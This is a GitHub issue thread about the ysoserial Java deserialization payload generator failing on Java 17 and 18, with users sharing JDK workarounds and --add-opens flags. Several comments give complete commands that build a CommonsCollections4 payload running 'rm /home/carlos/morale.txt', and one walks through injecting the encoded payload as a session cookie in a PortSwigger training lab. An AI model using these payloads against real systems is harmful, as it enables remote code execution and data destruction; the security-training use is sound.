frohoff / ysoserial

A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
http://frohoff.github.io/appseccali-marshalling-pickles/
MIT License

Ysoserial doesn't work with Java version 17 #203

Closed otium44 closed 7 months ago

otium44 commented 1 year ago

When I run ysoserial I got these errors:

Error while generating or serializing payload

$ java -jar ysoserial.jar CommonsCollections4 'Payload'
java.lang.IllegalAccessError: class ysoserial.payloads.util.Gadgets (in unnamed module @0x4015e7ec) cannot access class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl (in module java.xml) because module java.xml does not export com.sun.org.apache.xalan.internal.xsltc.trax to unnamed module @0x4015e7ec
        at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:102)
        at ysoserial.payloads.CommonsCollections4.getObject(CommonsCollections4.java:32)
        at ysoserial.payloads.CommonsCollections4.getObject(CommonsCollections4.java:26)
        at ysoserial.GeneratePayload.main(GeneratePayload.java:34)

I found out that these errors happen only with Java 17. I saw some people facing the same problem online. When I ran it again on Java 15 it worked. More info:

$ java --version
openjdk 17.0.6 2023-01-17
OpenJDK Runtime Environment (build 17.0.6+10-Debian-1)
OpenJDK 64-Bit Server VM (build 17.0.6+10-Debian-1, mixed mode, sharing)

ghost commented 1 year ago

Same issue with Java 18

$ java --version
openjdk 18.0.2 2022-07-19
OpenJDK Runtime Environment (build 18.0.2+10)
OpenJDK 64-Bit Server VM (build 18.0.2+10, mixed mode, sharing)
$ java -jar ysoserial.jar CommonsCollections1 calc.exe
Error while generating or serializing payload
java.lang.reflect.InaccessibleObjectException: Unable to make sun.reflect.annotation.AnnotationInvocationHandler(java.lang.Class,java.util.Map) accessible: module java.base does not "opens sun.reflect.annotation" to unnamed module @7fbd2524
    at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:354)
    at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:297)
    at java.base/java.lang.reflect.Constructor.checkCanSetAccessible(Constructor.java:191)
    at java.base/java.lang.reflect.Constructor.setAccessible(Constructor.java:184)
    at ysoserial.payloads.util.Reflections.setAccessible(Reflections.java:26)
    at ysoserial.payloads.util.Reflections.getFirstCtor(Reflections.java:55)
    at ysoserial.payloads.util.Gadgets.createMemoizedInvocationHandler(Gadgets.java:72)
    at ysoserial.payloads.util.Gadgets.createMemoitizedProxy(Gadgets.java:67)
    at ysoserial.payloads.CommonsCollections1.getObject(CommonsCollections1.java:71)
    at ysoserial.payloads.CommonsCollections1.getObject(CommonsCollections1.java:43)
    at ysoserial.GeneratePayload.main(GeneratePayload.java:34)

bountyhacking commented 1 year ago

OK, but how can I run ysoserial.jar with another version of Java?

bountyhacking commented 1 year ago

THIS IS THE SOLUTION FOR LINUX:

This solution worked for me. I'm doing a PortSwigger lab and I need this software to work. Here you can find, step by step, how I fixed it.

  1. Install Java 11: sudo apt-get install openjdk-11-jdk
  2. Add Java 11 to the PATH variable. To add the Java 11 installation directory to the PATH variable, you can open the .bashrc or .bash_profile file in your home directory using a text editor. For example, you can use the following command to open the .bashrc file: nano ~/.bashrc
  3. In the open file, add the following line to the end: export PATH="/usr/lib/jvm/java-11-openjdk-amd64/bin:$PATH"
  4. Save and exit nano.
  5. Restart the terminal with the following command: source ~/.bashrc
  6. Execute ysoserial. Example: java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64
  7. You should see the following output on the first line: Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

Alternative and easy way:

sudo apt update -y
sudo apt install openjdk-11-jdk
sudo update-alternatives --config java
java --version

otium44 commented 1 year ago

7. true

I also did it for the PortSwigger lab; I did it with Java 15.

JorianWoltjer commented 1 year ago

For anyone still wanting to use Java 17, it is possible through the --add-opens option in Java. See https://github.com/frohoff/ysoserial/issues/176 for more details, with a script I made that does this automatically in a comment there.

Anawak commented 1 year ago

I also stumbled over this issue while doing the Portswigger Labs. However, I didn't want to have a second java installation on my system. I found a way of making it work with Java 17 simply by shifting around the arguments of the call. On the Portswigger page, they give the following hint for Java 17 users:

java -jar ysoserial-all.jar \
   --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
   --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
   --add-opens=java.base/java.net=ALL-UNNAMED \
   --add-opens=java.base/java.util=ALL-UNNAMED \
   [payload] '[command]'

However, I still got only the normal startup prompt:

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Y SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
  Available payload types:
[List of payloads here]

Since it looked as if ysoserial didn't recognize the arguments correctly, I finally came up with this order, which worked fine in Kali:

java \
 --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED\
 --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED\
 --add-opens=java.base/sun.reflect.annotation=ALL-UNNAMED\
 -jar ./ysoserial.jar <payload> <command>

Hope this helps someone :)
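
Added example, not part of Anawak's post or of ysoserial: shell helpers for the two facts this thread turns on, how the JDK's module access-error text maps to the `--add-opens` flag used above, and why that flag only takes effect when it precedes `-jar`. The function names and `app.jar` are hypothetical, and only the `java [options] -jar file [args]` launch form is handled.

```shell
#!/bin/sh
# Added illustration; function names and app.jar are hypothetical.

# flag_for_error MESSAGE
# Print the --add-opens flag matching a JDK module access error, e.g.
#   module java.base does not "opens sun.reflect.annotation" to unnamed module @...
#   module java.xml does not export <package> to unnamed module @...
# The thread's commands use --add-opens for both error forms, so this does too.
# Prints nothing when the message is not a module access error.
flag_for_error() {
    printf '%s\n' "$1" | sed -n -E \
        's#.*module ([A-Za-z0-9_.]+) does not "?(opens|exports?) ([A-Za-z0-9_.]+)"? to unnamed module.*#--add-opens=\1/\3=ALL-UNNAMED#p'
}

# reaches_jvm FLAG JAVA_ARGS...
# For "java [options] -jar file [args]", the launcher consumes only the tokens
# before -jar as JVM options; everything after the jar path goes to main().
# Returns 0 if FLAG is among the JVM options, 1 otherwise.
reaches_jvm() {
    want=$1; shift
    for tok in "$@"; do
        [ "$tok" = "-jar" ] && return 1   # the rest belongs to the program
        [ "$tok" = "$want" ] && return 0
    done
    return 1
}

# Message text copied from the Java 18 trace earlier in this thread.
err='Unable to make sun.reflect.annotation.AnnotationInvocationHandler(java.lang.Class,java.util.Map) accessible: module java.base does not "opens sun.reflect.annotation" to unnamed module @7fbd2524'
needed=$(flag_for_error "$err")
echo "flag for this error: $needed"

# Constructed command lines: same flag, two positions.
if reaches_jvm "$needed" -jar app.jar "$needed" arg1; then
    echo "after -jar: applied by the JVM"
else
    echo "after -jar: handed to main() as a program argument, module stays closed"
fi
if reaches_jvm "$needed" "$needed" -jar app.jar arg1; then
    echo "before -jar: applied by the JVM"
fi
```

Each `--add-opens` re-exposes a JDK-internal package to reflection for the whole process, so pass only the packages named in the error.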

Libertocrat commented 1 year ago

Worked like a charm for me! I used Kali Linux v2023.3 with Java v17.0.8 to solve PortSwigger's lab

Thanks for sharing, you've saved me hours of further research & testing.

Otojon commented 11 months ago

BTW, whoever is still struggling with that particular lab or ysoserial, I recommend using Java 8. Here is how it worked for me (Linux):

  1. Download Java 8 from here https://jdk.java.net/java-se-ri/8-MR5
  2. tar xvf openjdk-bla-bla-bla.tar.gz
  3. /home/user/Downloads/java-se-8u43-ri/bin/java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64 > cookie.txt
  4. Remove whitespace from the cookie.txt file (use online tools, or you can do it manually).
  5. Paste your cookie as wiener cookies.
  6. Before sending the request, don't forget to URL-encode all characters (with Burp, choose the pasted cookie, right-click, Convert selection > URL > URL-encode all characters).
  7. Send the request.

Hope it helps ;)

DOP7 commented 9 months ago

@Anawak, thanks bro, your solution worked for PortSwigger lab no. 5, for Java 17 version users:

java \
 --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
 --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
 --add-opens=java.base/sun.reflect.annotation=ALL-UNNAMED \
 -jar ./ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64

frohoff commented 7 months ago

Duplicate of #176

panjie666 commented 6 months ago

Thanks bro, your solution worked for PortSwigger lab no. 5, for Java 17 version users:

java \
 --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
 --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
 --add-opens=java.base/sun.reflect.annotation=ALL-UNNAMED \
 -jar ./ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64 > tee.txt